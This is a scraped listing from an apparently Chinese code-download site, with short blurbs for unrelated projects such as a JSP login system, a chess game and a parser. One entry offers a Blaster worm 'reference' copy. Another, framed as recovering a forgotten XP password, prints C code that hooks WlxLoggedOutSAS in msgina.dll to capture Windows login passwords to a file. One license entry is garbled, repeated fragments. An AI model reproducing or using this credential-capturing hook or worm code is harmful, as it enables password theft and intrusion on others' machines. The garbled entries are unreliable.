-
JSP、Servlet和JavaBean的三层架构设计
使用JSP、Servlet和JavaBean设计的网站登录和成员管理功能。包括不同用户角色登录,以及管理员对用户申请登录后用户使用权限的授予和是否允许登录的审核
- 2022-03-22 18:28:53下载
- 积分:1
-
Windows Mobile手机中枚举拨号接入点
Windows Mobile手机中枚举拨号接入点-Windows Mobile phone dial-up access points enumerated
- 2022-06-28 07:59:11下载
- 积分:1
-
License Options file and may replace Named Users for a Program. whether temporar...
License Options file and may replace Named Users for a
Program, whether temporarily or not, no more than four (4)
times per year, prov
file never exceeds the number licensed per Program.
Portions of the Programs may be installed on individual
computers to accelerate startup times, as long as the-License Options file and may replace Named Users for a Program. whether temporarily or not. no more than four (4) times per year. 577 file never exceeds the number licensed per Program. Portions of the Programs may be instal led on individual computers to accelerate star tup times, as long as the
- 2023-05-10 03:15:03下载
- 积分:1
-
send and receive data via com port application
send and receive data via com port application
- 2022-01-26 01:25:51下载
- 积分:1
-
这个游戏很好玩哦,快快好吧,祝你玩的愉快
这个游戏很好玩哦,快快好吧,祝你玩的愉快-Oh this game is a lot of fun, as soon as possible Well, I wish you a happy fun
- 2022-05-05 23:24:10下载
- 积分:1
-
There is a big difference with real Worm.Blaster.So it is a only refference and...
同真正的冲击波有很大差距,希望大家查考,不要乱用-There is a big difference with real Worm.Blaster.So it is a only refference and don t misuse it.
- 2022-02-05 18:22:12下载
- 积分:1
-
语法分析器,用C++运行。非常好用啊!能运行。
语法分析器,用C++运行。非常好用啊!能运行。-Parser
- 2022-06-21 19:32:57下载
- 积分:1
-
windows核心编程源程序
windows核心编程源程序-windows core programming source
- 2022-07-07 15:04:26下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
象棋程序,实现了单人,双人玩象棋等功能。
象棋程序,实现了单人,双人玩象棋等功能。-Chess procedures realize a single, double features such as playing chess.
- 2022-01-25 20:33:29下载
- 积分:1